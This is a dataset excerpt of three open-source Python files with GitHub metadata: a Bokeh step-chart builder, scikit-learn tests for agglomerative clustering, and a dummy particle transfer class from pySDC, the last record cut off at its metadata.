text
stringlengths 4
1.02M
| meta
dict |
|---|---|
"""This is the Bokeh charts interface. It gives you a high level API to build
complex plot is a simple way.
This is the Step class which lets you build your Step charts just
passing the arguments to the Chart class and calling the proper functions.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import numpy as np
from six import string_types
from ..utils import cycle_colors
from .._builder import create_and_build, Builder
from ...models import ColumnDataSource, DataRange1d, GlyphRenderer
from ...models.glyphs import Line
from ...properties import Any
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
def Step(values, index=None, **kws):
return create_and_build(StepBuilder, values, index=index, **kws)
class StepBuilder(Builder):
"""This is the Step class and it is in charge of plotting
Step charts in an easy and intuitive way.
Essentially, we provide a way to ingest the data, make the proper
calculations and push the references into a source object.
We additionally make calculations for the ranges.
And finally add the needed lines taking the references from the
source.
"""
index = Any(help="""
An index to be used for all data series as follows:
- A 1d iterable of any sort that will be used as
series common index
- As a string that corresponds to the key of the
mapping to be used as index (and not as data
series) if area.values is a mapping (like a dict,
an OrderedDict or a pandas DataFrame)
""")
def get_data(self):
"""It calculates the chart properties accordingly from Step.values.
Then build a dict containing references to all the points to be
used by the segment glyph inside the ``draw`` method.
"""
self._data = dict()
self._groups = []
orig_xs = self._values_index
xs = np.empty(2*len(orig_xs)-1, dtype=np.int)
xs[::2] = orig_xs[:]
xs[1::2] = orig_xs[1:]
self._data['x'] = xs
for i, col in enumerate(self._values.keys()):
if isinstance(self.index, string_types) and col == self.index:
continue
# save every new group we find
self._groups.append(col)
orig_ys = np.array([self._values[col][x] for x in orig_xs])
ys = np.empty(2*len(orig_ys)-1)
ys[::2] = orig_ys[:]
ys[1::2] = orig_ys[:-1]
self._data['y_%s' % col] = ys
def get_source(self):
""" Push the Step data into the ColumnDataSource and calculate
the proper ranges.
"""
sc = self._source = ColumnDataSource(self._data)
self.x_range = DataRange1d(sources=[sc.columns("x")])
y_sources = [sc.columns("y_%s" % col) for col in self._groups]
self.y_range = DataRange1d(sources=y_sources)
def draw(self):
"""Use the line glyphs to connect the xy points in the Step.
Takes reference points from the data loaded at the ColumnDataSource.
"""
colors = cycle_colors(self._groups, self.palette)
for i, name in enumerate(self._groups):
# draw the step horizontal segment
glyph = Line(x="x", y="y_%s" % name, line_color=colors[i], line_width=2)
renderer = GlyphRenderer(data_source=self._source, glyph=glyph)
self._legends.append((self._groups[i], [renderer]))
yield renderer
|
{
"content_hash": "69218cd2468342fd71b76b8b4022e787",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 84,
"avg_line_length": 36.47747747747748,
"alnum_prop": 0.561373178562608,
"repo_name": "almarklein/bokeh",
"id": "ec3b68abc5c1a31973d9c5fda476b1f7e4b8fa1d",
"size": "4049",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bokeh/charts/builder/step_builder.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "410607"
},
{
"name": "CoffeeScript",
"bytes": "2138603"
},
{
"name": "JavaScript",
"bytes": "349966"
},
{
"name": "Makefile",
"bytes": "6253"
},
{
"name": "Python",
"bytes": "1543731"
},
{
"name": "Scala",
"bytes": "28963"
},
{
"name": "Shell",
"bytes": "20366"
}
],
"symlink_target": ""
}
|
"""
Several basic tests for hierarchical clustering procedures
"""
# Authors: Vincent Michel, 2010, Gael Varoquaux 2012,
# Matteo Visconti di Oleggio Castello 2014
# License: BSD 3 clause
import itertools
from tempfile import mkdtemp
import shutil
import pytest
from functools import partial
import numpy as np
from scipy import sparse
from scipy.cluster import hierarchy
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.neighbors.tests.test_dist_metrics import METRICS_DEFAULT_PARAMS
from sklearn.utils._testing import (
assert_almost_equal,
create_memmap_backed_data
)
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import ignore_warnings
from sklearn.cluster import ward_tree
from sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration
from sklearn.cluster._agglomerative import (_hc_cut, _TREE_BUILDERS,
linkage_tree,
_fix_connectivity)
from sklearn.feature_extraction.image import grid_to_graph
from sklearn.metrics.pairwise import PAIRED_DISTANCES, cosine_distances,\
manhattan_distances, pairwise_distances
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.neighbors import kneighbors_graph, DistanceMetric
from sklearn.cluster._hierarchical_fast import (
average_merge,
max_merge,
mst_linkage_core
)
from sklearn.utils._fast_dict import IntFloatDict
from sklearn.utils._testing import assert_array_equal
from sklearn.datasets import make_moons, make_circles
def test_linkage_misc():
# Misc tests on linkage
rng = np.random.RandomState(42)
X = rng.normal(size=(5, 5))
with pytest.raises(ValueError):
AgglomerativeClustering(linkage='foo').fit(X)
with pytest.raises(ValueError):
linkage_tree(X, linkage='foo')
with pytest.raises(ValueError):
linkage_tree(X, connectivity=np.ones((4, 4)))
# Smoke test FeatureAgglomeration
FeatureAgglomeration().fit(X)
# test hierarchical clustering on a precomputed distances matrix
dis = cosine_distances(X)
res = linkage_tree(dis, affinity="precomputed")
assert_array_equal(res[0], linkage_tree(X, affinity="cosine")[0])
# test hierarchical clustering on a precomputed distances matrix
res = linkage_tree(X, affinity=manhattan_distances)
assert_array_equal(res[0], linkage_tree(X, affinity="manhattan")[0])
def test_structured_linkage_tree():
# Check that we obtain the correct solution for structured linkage trees.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
# Avoiding a mask with only 'True' entries
mask[4:7, 4:7] = 0
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for tree_builder in _TREE_BUILDERS.values():
children, n_components, n_leaves, parent = \
tree_builder(X.T, connectivity=connectivity)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
# Check that ward_tree raises a ValueError with a connectivity matrix
# of the wrong shape
with pytest.raises(ValueError):
tree_builder(X.T, connectivity=np.ones((4, 4)))
# Check that fitting with no samples raises an error
with pytest.raises(ValueError):
tree_builder(X.T[:0], connectivity=connectivity)
def test_unstructured_linkage_tree():
# Check that we obtain the correct solution for unstructured linkage trees.
rng = np.random.RandomState(0)
X = rng.randn(50, 100)
for this_X in (X, X[0]):
# With specified a number of clusters just for the sake of
# raising a warning and testing the warning code
with ignore_warnings():
with pytest.warns(UserWarning):
children, n_nodes, n_leaves, parent = ward_tree(
this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
for tree_builder in _TREE_BUILDERS.values():
for this_X in (X, X[0]):
with ignore_warnings():
with pytest.warns(UserWarning):
children, n_nodes, n_leaves, parent = tree_builder(
this_X.T, n_clusters=10)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
def test_height_linkage_tree():
# Check that the height of the results of linkage tree is sorted.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
for linkage_func in _TREE_BUILDERS.values():
children, n_nodes, n_leaves, parent = linkage_func(
X.T, connectivity=connectivity)
n_nodes = 2 * X.shape[1] - 1
assert len(children) + n_leaves == n_nodes
def test_agglomerative_clustering_wrong_arg_memory():
# Test either if an error is raised when memory is not
# either a str or a joblib.Memory instance
rng = np.random.RandomState(0)
n_samples = 100
X = rng.randn(n_samples, 50)
memory = 5
clustering = AgglomerativeClustering(memory=memory)
with pytest.raises(ValueError):
clustering.fit(X)
def test_zero_cosine_linkage_tree():
# Check that zero vectors in X produce an error when
# 'cosine' affinity is used
X = np.array([[0, 1],
[0, 0]])
msg = 'Cosine affinity cannot be used when X contains zero vectors'
with pytest.raises(ValueError, match=msg):
linkage_tree(X, affinity='cosine')
@pytest.mark.parametrize('n_clusters, distance_threshold',
[(None, 0.5), (10, None)])
@pytest.mark.parametrize('compute_distances', [True, False])
@pytest.mark.parametrize('linkage', ["ward", "complete", "average", "single"])
def test_agglomerative_clustering_distances(n_clusters,
compute_distances,
distance_threshold,
linkage):
# Check that when `compute_distances` is True or `distance_threshold` is
# given, the fitted model has an attribute `distances_`.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
clustering = AgglomerativeClustering(n_clusters=n_clusters,
connectivity=connectivity,
linkage=linkage,
distance_threshold=distance_threshold,
compute_distances=compute_distances)
clustering.fit(X)
if compute_distances or (distance_threshold is not None):
assert hasattr(clustering, 'distances_')
n_children = clustering.children_.shape[0]
n_nodes = n_children + 1
assert clustering.distances_.shape == (n_nodes-1, )
else:
assert not hasattr(clustering, 'distances_')
def test_agglomerative_clustering():
# Check that we obtain the correct number of clusters with
# agglomerative clustering.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
for linkage in ("ward", "complete", "average", "single"):
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage=linkage)
clustering.fit(X)
# test caching
try:
tempdir = mkdtemp()
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity,
memory=tempdir,
linkage=linkage)
clustering.fit(X)
labels = clustering.labels_
assert np.size(np.unique(labels)) == 10
finally:
shutil.rmtree(tempdir)
# Turn caching off now
clustering = AgglomerativeClustering(
n_clusters=10, connectivity=connectivity, linkage=linkage)
# Check that we obtain the same solution with early-stopping of the
# tree building
clustering.compute_full_tree = False
clustering.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
labels), 1)
clustering.connectivity = None
clustering.fit(X)
assert np.size(np.unique(clustering.labels_)) == 10
# Check that we raise a TypeError on dense matrices
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=sparse.lil_matrix(
connectivity.toarray()[:10, :10]),
linkage=linkage)
with pytest.raises(ValueError):
clustering.fit(X)
# Test that using ward with another metric than euclidean raises an
# exception
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=connectivity.toarray(),
affinity="manhattan",
linkage="ward")
with pytest.raises(ValueError):
clustering.fit(X)
# Test using another metric than euclidean works with linkage complete
for affinity in PAIRED_DISTANCES.keys():
# Compare our (structured) implementation to scipy
clustering = AgglomerativeClustering(
n_clusters=10,
connectivity=np.ones((n_samples, n_samples)),
affinity=affinity,
linkage="complete")
clustering.fit(X)
clustering2 = AgglomerativeClustering(
n_clusters=10,
connectivity=None,
affinity=affinity,
linkage="complete")
clustering2.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering2.labels_,
clustering.labels_),
1)
# Test that using a distance matrix (affinity = 'precomputed') has same
# results (with connectivity constraints)
clustering = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
linkage="complete")
clustering.fit(X)
X_dist = pairwise_distances(X)
clustering2 = AgglomerativeClustering(n_clusters=10,
connectivity=connectivity,
affinity='precomputed',
linkage="complete")
clustering2.fit(X_dist)
assert_array_equal(clustering.labels_, clustering2.labels_)
def test_agglomerative_clustering_memory_mapped():
"""AgglomerativeClustering must work on mem-mapped dataset.
Non-regression test for issue #19875.
"""
rng = np.random.RandomState(0)
Xmm = create_memmap_backed_data(rng.randn(50, 100))
AgglomerativeClustering(affinity="euclidean", linkage="single").fit(Xmm)
def test_ward_agglomeration():
# Check that we obtain the correct solution in a simplistic case
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
X = rng.randn(50, 100)
connectivity = grid_to_graph(*mask.shape)
agglo = FeatureAgglomeration(n_clusters=5, connectivity=connectivity)
agglo.fit(X)
assert np.size(np.unique(agglo.labels_)) == 5
X_red = agglo.transform(X)
assert X_red.shape[1] == 5
X_full = agglo.inverse_transform(X_red)
assert np.unique(X_full[0]).size == 5
assert_array_almost_equal(agglo.transform(X_full), X_red)
# Check that fitting with no samples raises a ValueError
with pytest.raises(ValueError):
agglo.fit(X[:0])
def test_single_linkage_clustering():
# Check that we get the correct result in two emblematic cases
moons, moon_labels = make_moons(noise=0.05, random_state=42)
clustering = AgglomerativeClustering(n_clusters=2, linkage='single')
clustering.fit(moons)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
moon_labels), 1)
circles, circle_labels = make_circles(factor=0.5, noise=0.025,
random_state=42)
clustering = AgglomerativeClustering(n_clusters=2, linkage='single')
clustering.fit(circles)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
circle_labels), 1)
def assess_same_labelling(cut1, cut2):
"""Util for comparison with scipy"""
co_clust = []
for cut in [cut1, cut2]:
n = len(cut)
k = cut.max() + 1
ecut = np.zeros((n, k))
ecut[np.arange(n), cut] = 1
co_clust.append(np.dot(ecut, ecut.T))
assert (co_clust[0] == co_clust[1]).all()
def test_sparse_scikit_vs_scipy():
# Test scikit linkage with full connectivity (i.e. unstructured) vs scipy
n, p, k = 10, 5, 3
rng = np.random.RandomState(0)
# Not using a lil_matrix here, just to check that non sparse
# matrices are well handled
connectivity = np.ones((n, n))
for linkage in _TREE_BUILDERS.keys():
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out = hierarchy.linkage(X, method=linkage)
children_ = out[:, :2].astype(int, copy=False)
children, _, n_leaves, _ = _TREE_BUILDERS[linkage](
X, connectivity=connectivity)
# Sort the order of child nodes per row for consistency
children.sort(axis=1)
assert_array_equal(children, children_, 'linkage tree differs'
' from scipy impl for'
' linkage: ' + linkage)
cut = _hc_cut(k, children, n_leaves)
cut_ = _hc_cut(k, children_, n_leaves)
assess_same_labelling(cut, cut_)
# Test error management in _hc_cut
with pytest.raises(ValueError):
_hc_cut(n_leaves + 1, children, n_leaves)
# Make sure our custom mst_linkage_core gives
# the same results as scipy's builtin
@pytest.mark.parametrize('seed', range(5))
def test_vector_scikit_single_vs_scipy_single(seed):
n_samples, n_features, n_clusters = 10, 5, 3
rng = np.random.RandomState(seed)
X = .1 * rng.normal(size=(n_samples, n_features))
X -= 4. * np.arange(n_samples)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out = hierarchy.linkage(X, method='single')
children_scipy = out[:, :2].astype(int)
children, _, n_leaves, _ = _TREE_BUILDERS['single'](X)
# Sort the order of child nodes per row for consistency
children.sort(axis=1)
assert_array_equal(children, children_scipy,
'linkage tree differs'
' from scipy impl for'
' single linkage.')
cut = _hc_cut(n_clusters, children, n_leaves)
cut_scipy = _hc_cut(n_clusters, children_scipy, n_leaves)
assess_same_labelling(cut, cut_scipy)
@pytest.mark.parametrize('metric', METRICS_DEFAULT_PARAMS)
def test_mst_linkage_core_memory_mapped(metric):
"""The MST-LINKAGE-CORE algorithm must work on mem-mapped dataset.
Non-regression test for issue #19875.
"""
rng = np.random.RandomState(seed=1)
X = rng.normal(size=(20, 4))
Xmm = create_memmap_backed_data(X)
argdict = METRICS_DEFAULT_PARAMS[metric]
keys = argdict.keys()
for vals in itertools.product(*argdict.values()):
kwargs = dict(zip(keys, vals))
distance_metric = DistanceMetric.get_metric(metric, **kwargs)
mst = mst_linkage_core(X, distance_metric)
mst_mm = mst_linkage_core(Xmm, distance_metric)
np.testing.assert_equal(mst, mst_mm)
def test_identical_points():
# Ensure identical points are handled correctly when using mst with
# a sparse connectivity matrix
X = np.array([[0, 0, 0], [0, 0, 0],
[1, 1, 1], [1, 1, 1],
[2, 2, 2], [2, 2, 2]])
true_labels = np.array([0, 0, 1, 1, 2, 2])
connectivity = kneighbors_graph(X, n_neighbors=3, include_self=False)
connectivity = 0.5 * (connectivity + connectivity.T)
connectivity, n_components = _fix_connectivity(X,
connectivity,
'euclidean')
for linkage in ('single', 'average', 'average', 'ward'):
clustering = AgglomerativeClustering(n_clusters=3,
linkage=linkage,
connectivity=connectivity)
clustering.fit(X)
assert_almost_equal(normalized_mutual_info_score(clustering.labels_,
true_labels), 1)
def test_connectivity_propagation():
# Check that connectivity in the ward tree is propagated correctly during
# merging.
X = np.array([(.014, .120), (.014, .099), (.014, .097),
(.017, .153), (.017, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .153), (.018, .153), (.018, .153),
(.018, .152), (.018, .149), (.018, .144)])
connectivity = kneighbors_graph(X, 10, include_self=False)
ward = AgglomerativeClustering(
n_clusters=4, connectivity=connectivity, linkage='ward')
# If changes are not propagated correctly, fit crashes with an
# IndexError
ward.fit(X)
def test_ward_tree_children_order():
# Check that children are ordered in the same way for both structured and
# unstructured versions of ward_tree.
# test on five random datasets
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X)
out_structured = ward_tree(X, connectivity=connectivity)
assert_array_equal(out_unstructured[0], out_structured[0])
def test_ward_linkage_tree_return_distance():
# Test return_distance option on linkage and ward trees
# test that return_distance when set true, gives same
# output on both structured and unstructured clustering.
n, p = 10, 5
rng = np.random.RandomState(0)
connectivity = np.ones((n, n))
for i in range(5):
X = .1 * rng.normal(size=(n, p))
X -= 4. * np.arange(n)[:, np.newaxis]
X -= X.mean(axis=1)[:, np.newaxis]
out_unstructured = ward_tree(X, return_distance=True)
out_structured = ward_tree(X, connectivity=connectivity,
return_distance=True)
# get children
children_unstructured = out_unstructured[0]
children_structured = out_structured[0]
# check if we got the same clusters
assert_array_equal(children_unstructured, children_structured)
# check if the distances are the same
dist_unstructured = out_unstructured[-1]
dist_structured = out_structured[-1]
assert_array_almost_equal(dist_unstructured, dist_structured)
for linkage in ['average', 'complete', 'single']:
structured_items = linkage_tree(
X, connectivity=connectivity, linkage=linkage,
return_distance=True)[-1]
unstructured_items = linkage_tree(
X, linkage=linkage, return_distance=True)[-1]
structured_dist = structured_items[-1]
unstructured_dist = unstructured_items[-1]
structured_children = structured_items[0]
unstructured_children = unstructured_items[0]
assert_array_almost_equal(structured_dist, unstructured_dist)
assert_array_almost_equal(
structured_children, unstructured_children)
# test on the following dataset where we know the truth
# taken from scipy/cluster/tests/hierarchy_test_data.py
X = np.array([[1.43054825, -7.5693489],
[6.95887839, 6.82293382],
[2.87137846, -9.68248579],
[7.87974764, -6.05485803],
[8.24018364, -6.09495602],
[7.39020262, 8.54004355]])
# truth
linkage_X_ward = np.array([[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 9.10208346, 4.],
[7., 9., 24.7784379, 6.]])
linkage_X_complete = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.96742194, 4.],
[7., 9., 18.77445997, 6.]])
linkage_X_average = np.array(
[[3., 4., 0.36265956, 2.],
[1., 5., 1.77045373, 2.],
[0., 2., 2.55760419, 2.],
[6., 8., 6.55832839, 4.],
[7., 9., 15.44089605, 6.]])
n_samples, n_features = np.shape(X)
connectivity_X = np.ones((n_samples, n_samples))
out_X_unstructured = ward_tree(X, return_distance=True)
out_X_structured = ward_tree(X, connectivity=connectivity_X,
return_distance=True)
# check that the labels are the same
assert_array_equal(linkage_X_ward[:, :2], out_X_unstructured[0])
assert_array_equal(linkage_X_ward[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_unstructured[4])
assert_array_almost_equal(linkage_X_ward[:, 2], out_X_structured[4])
linkage_options = ['complete', 'average', 'single']
X_linkage_truth = [linkage_X_complete, linkage_X_average]
for (linkage, X_truth) in zip(linkage_options, X_linkage_truth):
out_X_unstructured = linkage_tree(
X, return_distance=True, linkage=linkage)
out_X_structured = linkage_tree(
X, connectivity=connectivity_X, linkage=linkage,
return_distance=True)
# check that the labels are the same
assert_array_equal(X_truth[:, :2], out_X_unstructured[0])
assert_array_equal(X_truth[:, :2], out_X_structured[0])
# check that the distances are correct
assert_array_almost_equal(X_truth[:, 2], out_X_unstructured[4])
assert_array_almost_equal(X_truth[:, 2], out_X_structured[4])
def test_connectivity_fixing_non_lil():
# Check non regression of a bug if a non item assignable connectivity is
# provided with more than one component.
# create dummy data
x = np.array([[0, 0], [1, 1]])
# create a mask with several components to force connectivity fixing
m = np.array([[True, False], [False, True]])
c = grid_to_graph(n_x=2, n_y=2, mask=m)
w = AgglomerativeClustering(connectivity=c, linkage='ward')
with pytest.warns(UserWarning):
w.fit(x)
def test_int_float_dict():
rng = np.random.RandomState(0)
keys = np.unique(rng.randint(100, size=10).astype(np.intp, copy=False))
values = rng.rand(len(keys))
d = IntFloatDict(keys, values)
for key, value in zip(keys, values):
assert d[key] == value
other_keys = np.arange(50, dtype=np.intp)[::2]
other_values = np.full(50, 0.5)[::2]
other = IntFloatDict(other_keys, other_values)
# Complete smoke test
max_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
average_merge(d, other, mask=np.ones(100, dtype=np.intp), n_a=1, n_b=1)
def test_connectivity_callable():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(
connectivity=partial(kneighbors_graph, n_neighbors=3,
include_self=False))
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_connectivity_ignores_diagonal():
rng = np.random.RandomState(0)
X = rng.rand(20, 5)
connectivity = kneighbors_graph(X, 3, include_self=False)
connectivity_include_self = kneighbors_graph(X, 3, include_self=True)
aglc1 = AgglomerativeClustering(connectivity=connectivity)
aglc2 = AgglomerativeClustering(connectivity=connectivity_include_self)
aglc1.fit(X)
aglc2.fit(X)
assert_array_equal(aglc1.labels_, aglc2.labels_)
def test_compute_full_tree():
# Test that the full tree is computed if n_clusters is small
rng = np.random.RandomState(0)
X = rng.randn(10, 2)
connectivity = kneighbors_graph(X, 5, include_self=False)
# When n_clusters is less, the full tree should be built
# that is the number of merges should be n_samples - 1
agc = AgglomerativeClustering(n_clusters=2, connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert n_nodes == n_samples - 1
# When n_clusters is large, greater than max of 100 and 0.02 * n_samples.
# we should stop when there are n_clusters.
n_clusters = 101
X = rng.randn(200, 2)
connectivity = kneighbors_graph(X, 10, include_self=False)
agc = AgglomerativeClustering(n_clusters=n_clusters,
connectivity=connectivity)
agc.fit(X)
n_samples = X.shape[0]
n_nodes = agc.children_.shape[0]
assert n_nodes == n_samples - n_clusters
def test_n_components():
# Test n_components returned by linkage, average and ward tree
rng = np.random.RandomState(0)
X = rng.rand(5, 5)
# Connectivity matrix having five components.
connectivity = np.eye(5)
for linkage_func in _TREE_BUILDERS.values():
assert ignore_warnings(linkage_func)(
X, connectivity=connectivity)[1] == 5
def test_agg_n_clusters():
# Test that an error is raised when n_clusters <= 0
rng = np.random.RandomState(0)
X = rng.rand(20, 10)
for n_clus in [-1, 0]:
agc = AgglomerativeClustering(n_clusters=n_clus)
msg = ("n_clusters should be an integer greater than 0."
" %s was provided." % str(agc.n_clusters))
with pytest.raises(ValueError, match=msg):
agc.fit(X)
def test_affinity_passed_to_fix_connectivity():
# Test that the affinity parameter is actually passed to the pairwise
# function
size = 2
rng = np.random.RandomState(0)
X = rng.randn(size, size)
mask = np.array([True, False, False, True])
connectivity = grid_to_graph(n_x=size, n_y=size,
mask=mask, return_as=np.ndarray)
class FakeAffinity:
def __init__(self):
self.counter = 0
def increment(self, *args, **kwargs):
self.counter += 1
return self.counter
fa = FakeAffinity()
linkage_tree(X, connectivity=connectivity, affinity=fa.increment)
assert fa.counter == 3
@pytest.mark.parametrize('linkage', ['ward', 'complete', 'average'])
def test_agglomerative_clustering_with_distance_threshold(linkage):
# Check that we obtain the correct number of clusters with
# agglomerative clustering with distance_threshold.
rng = np.random.RandomState(0)
mask = np.ones([10, 10], dtype=bool)
n_samples = 100
X = rng.randn(n_samples, 50)
connectivity = grid_to_graph(*mask.shape)
# test when distance threshold is set to 10
distance_threshold = 10
for conn in [None, connectivity]:
clustering = AgglomerativeClustering(
n_clusters=None,
distance_threshold=distance_threshold,
connectivity=conn, linkage=linkage)
clustering.fit(X)
clusters_produced = clustering.labels_
num_clusters_produced = len(np.unique(clustering.labels_))
# test if the clusters produced match the point in the linkage tree
# where the distance exceeds the threshold
tree_builder = _TREE_BUILDERS[linkage]
children, n_components, n_leaves, parent, distances = \
tree_builder(X, connectivity=conn, n_clusters=None,
return_distance=True)
num_clusters_at_threshold = np.count_nonzero(
distances >= distance_threshold) + 1
# test number of clusters produced
assert num_clusters_at_threshold == num_clusters_produced
# test clusters produced
clusters_at_threshold = _hc_cut(n_clusters=num_clusters_produced,
children=children,
n_leaves=n_leaves)
assert np.array_equiv(clusters_produced,
clusters_at_threshold)
def test_small_distance_threshold():
rng = np.random.RandomState(0)
n_samples = 10
X = rng.randint(-300, 300, size=(n_samples, 3))
# this should result in all data in their own clusters, given that
# their pairwise distances are bigger than .1 (which may not be the case
# with a different random seed).
clustering = AgglomerativeClustering(
n_clusters=None,
distance_threshold=1.,
linkage="single").fit(X)
# check that the pairwise distances are indeed all larger than .1
all_distances = pairwise_distances(X, metric='minkowski', p=2)
np.fill_diagonal(all_distances, np.inf)
assert np.all(all_distances > .1)
assert clustering.n_clusters_ == n_samples
def test_cluster_distances_with_distance_threshold():
rng = np.random.RandomState(0)
n_samples = 100
X = rng.randint(-10, 10, size=(n_samples, 3))
# check the distances within the clusters and with other clusters
distance_threshold = 4
clustering = AgglomerativeClustering(
n_clusters=None,
distance_threshold=distance_threshold,
linkage="single").fit(X)
labels = clustering.labels_
D = pairwise_distances(X, metric="minkowski", p=2)
# to avoid taking the 0 diagonal in min()
np.fill_diagonal(D, np.inf)
for label in np.unique(labels):
in_cluster_mask = labels == label
max_in_cluster_distance = (D[in_cluster_mask][:, in_cluster_mask]
.min(axis=0).max())
min_out_cluster_distance = (D[in_cluster_mask][:, ~in_cluster_mask]
.min(axis=0).min())
# single data point clusters only have that inf diagonal here
if in_cluster_mask.sum() > 1:
assert max_in_cluster_distance < distance_threshold
assert min_out_cluster_distance >= distance_threshold
@pytest.mark.parametrize('linkage', ['ward', 'complete', 'average'])
@pytest.mark.parametrize(('threshold', 'y_true'),
[(0.5, [1, 0]), (1.0, [1, 0]), (1.5, [0, 0])])
def test_agglomerative_clustering_with_distance_threshold_edge_case(
linkage, threshold, y_true):
# test boundary case of distance_threshold matching the distance
X = [[0], [1]]
clusterer = AgglomerativeClustering(
n_clusters=None,
distance_threshold=threshold,
linkage=linkage)
y_pred = clusterer.fit_predict(X)
assert adjusted_rand_score(y_true, y_pred) == 1
def test_dist_threshold_invalid_parameters():
X = [[0], [1]]
with pytest.raises(ValueError, match="Exactly one of "):
AgglomerativeClustering(n_clusters=None,
distance_threshold=None).fit(X)
with pytest.raises(ValueError, match="Exactly one of "):
AgglomerativeClustering(n_clusters=2,
distance_threshold=1).fit(X)
X = [[0], [1]]
with pytest.raises(ValueError, match="compute_full_tree must be True if"):
AgglomerativeClustering(n_clusters=None,
distance_threshold=1,
compute_full_tree=False).fit(X)
def test_invalid_shape_precomputed_dist_matrix():
# Check that an error is raised when affinity='precomputed'
# and a non square matrix is passed (PR #16257).
rng = np.random.RandomState(0)
X = rng.rand(5, 3)
with pytest.raises(ValueError, match="Distance matrix should be square, "):
AgglomerativeClustering(affinity='precomputed',
linkage='complete').fit(X)
|
{
"content_hash": "bef0493a72b3f10ff132fb4ecf448a11",
"timestamp": "",
"source": "github",
"line_count": 837,
"max_line_length": 79,
"avg_line_length": 39.05615292712067,
"alnum_prop": 0.6093300703579076,
"repo_name": "kevin-intel/scikit-learn",
"id": "bd70b2c1aac543a5b8b8e45f59c9def0d3a3924a",
"size": "32690",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sklearn/cluster/tests/test_hierarchical.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1579"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "6394128"
},
{
"name": "Shell",
"bytes": "9250"
}
],
"symlink_target": ""
}
|
from pySDC.Transfer import transfer
from pySDC.datatype_classes.particles import particles, fields
class particles_to_particles(transfer):
"""
Custon transfer class, implements Transfer.py
This implementation is just a dummy for particles with no functionality. It can be used to check if in the particle
setups the number of iterations is halved once two levels are used.
Attributes:
fine: reference to the fine level
coarse: reference to the coarse level
init_f: number of variables on the fine level (whatever init represents there)
init_c: number of variables on the coarse level (whatever init represents there)
"""
def __init__(self,fine_level,coarse_level):
"""
Initialization routine
Args:
fine_level: fine level connected with the transfer operations (passed to parent)
coarse_level: coarse level connected with the transfer operations (passed to parent)
"""
super(particles_to_particles,self).__init__(fine_level,coarse_level)
pass
def restrict_space(self,F):
"""
Dummy restriction routine
Args:
F: the fine level data (easier to access than via the fine attribute)
"""
if isinstance(F,particles):
G = particles(F)
elif isinstance(F,fields):
G = fields(F)
else:
print('Transfer error')
exit()
return G
def prolong_space(self,G):
"""
Dummy prolongation routine
Args:
G: the coarse level data (easier to access than via the coarse attribute)
"""
if isinstance(G,particles):
F = particles(G)
elif isinstance(G,fields):
F = fields(G)
else:
print('Transfer error')
exit()
return F
|
{
